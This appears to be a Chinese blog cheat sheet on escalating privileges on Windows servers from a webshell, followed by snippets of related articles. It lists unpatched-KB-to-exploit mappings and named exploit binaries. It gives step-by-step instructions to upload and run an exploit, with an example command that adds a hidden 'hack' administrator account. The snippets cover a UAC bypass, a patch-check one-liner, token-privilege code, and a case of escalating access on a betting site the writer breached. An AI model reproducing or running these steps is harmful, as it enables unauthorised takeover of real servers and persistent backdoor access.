Windows溢出提权小结

1、  查看系统打补丁情况:systeminfo

2、  查看KB-EXP表:

KB2360937 MS10-084

KB2478960 MS11-014

KB2507938 MS11-056

KB2566454 MS11-062

KB2646524 MS12-003

KB2645640 MS12-009

KB2641653 MS12-018

KB952004 MS09-012 Pr.exe

KB956572 MS09-012 巴西烤肉

KB971657 MS09-041

KB2620712 MS11-097

KB2393802 MS11-011 ms11011.exe

KB942831 MS08-005

KB2503665 MS11-046 ms11046.exe

KB2592799 MS11-080 ms11080.exe

这个表以后会不断更新!

3、  webshell中查找可读可写可执行的目录,然后上传我们的EXP

如果不能上传,则通过下载EXP解决

4、  webshell中执行我们的EXP

比如:

pr.exe “whoami”

执行结果:

administrator

pr.exe “net user hack 1234 /add & net localgroup administrators hack /add”

其他的EXP一个道理~

EXP可以参考一下暗月的~

时间: 2024-10-08 03:28:50

Windows溢出提权小结的相关文章

[提权]Windows UAC 提权(CVE-2019-1388)

0x00 UAC简介 首先来理解一下什么是 UAC : 用户账户控制UAC:UAC 是 win10 操作系统中非常重要的安全功能,它起源于 windows vista 操作系统,流行于 windows7.windows8 .各种功能策略得到了完善的修订和开发,应用在 win10 操作系统中,目的是减少恶意软件对系统的侵害. 操作系统默认情况下是启用UAC,当用户运行软件就会触发UAC规则.执行的时候就需要权限,否则是不会运行的. 不涉及到更改计算机操作的项目是不会触发UAC规则的,能够触发UAC

主机溢出提权漏洞分析

背景介绍公司内部服务器,上面有一简单的上传入口,刚入职的小伙伴在C盘根目录下有一个TXT文本文件,说权限设置的很低,除Administrator外,其他用户无法读取到内容,直接向安全工程师"墨者"发出挑战,让其测试. 实训目标1.掌握文件上传的技巧:2.掌握IIS中间件存在的畸形解析漏洞:3.了解Windows系统CMD命令执行:4.了解查看操作系统安全补丁情况:5.了解Windows操作系统的文件权限设置:6.了解操作系统的溢出漏洞的提权方式: 解题方向通过上传脚本文件,读取C盘下T

windows内核提权

Windows by default are vulnerable to several vulnerabilities that could allow an attacker to execute malicious code in order to abuse a system. From the other side patching systems sufficiently is one of the main problems in security. Even if an orga

windows本地提权对照表(转载)

2003   结果保存在C:\Windows\Temp\temp.txt systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393

windows下,提权代码.

bool AdjustPrivileges() { HANDLE hToken = NULL; TOKEN_PRIVILEGES tp; TOKEN_PRIVILEGES oldtp; DWORD dwSize = sizeof(TOKEN_PRIVILEGES); LUID luid; OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken); if (!LookupPrivilegeValue(NULL, SE_DEBU

[转帖]提权

windows提权 https://www.cnblogs.com/v01cano/p/10317458.html 之前一直不太理解 感觉作者写的很好记录一下. 0,起因,由于前几天拿了一个菠菜站的webshell,但是只有iis权限,执行无法创建用户等操作,更无法对整个服务器进行控制了,于是此时便需要提权了,对于一个刚刚入门的小白来说,此刻真正意识到了提权的重要性,于是便开始学习提取相关知识,以拿下该菠菜的站点. 提权前的准备工作 1,通常来说,不同的脚本所处的权限是不一样的.这就意味着,如果

提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的普通用户提升为管理员用户的一种操作,提权常常用于辅助旁注攻击. 下面我们来了解下window的权限(来自百度百科): Windows 提供了非常细致的权限控制项,能够精确定制用户对资源的访问控制能力,大多数的权限从其名称上就可以基本了解其所能实现的内容. " 权限"(Permission)

windows提权方法总结

windwos提权方法分为两大块: 一.系统漏洞 二.第三方软件漏洞 系统信息泄露和配置不当都可能导致系统被入侵,下面总结是一些常用的windows提权方式. 1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限) 2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接) 3,PCANYWHRER提权(也是远程客户端软件,下载安装目录的CIF文件进行破解) 4,SAM提权(SAM系统帐户,通常需要下载临时

最全的服务器提权

最全的WEBSHELLc: d: e:..... -------------------------------------------------------------------C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\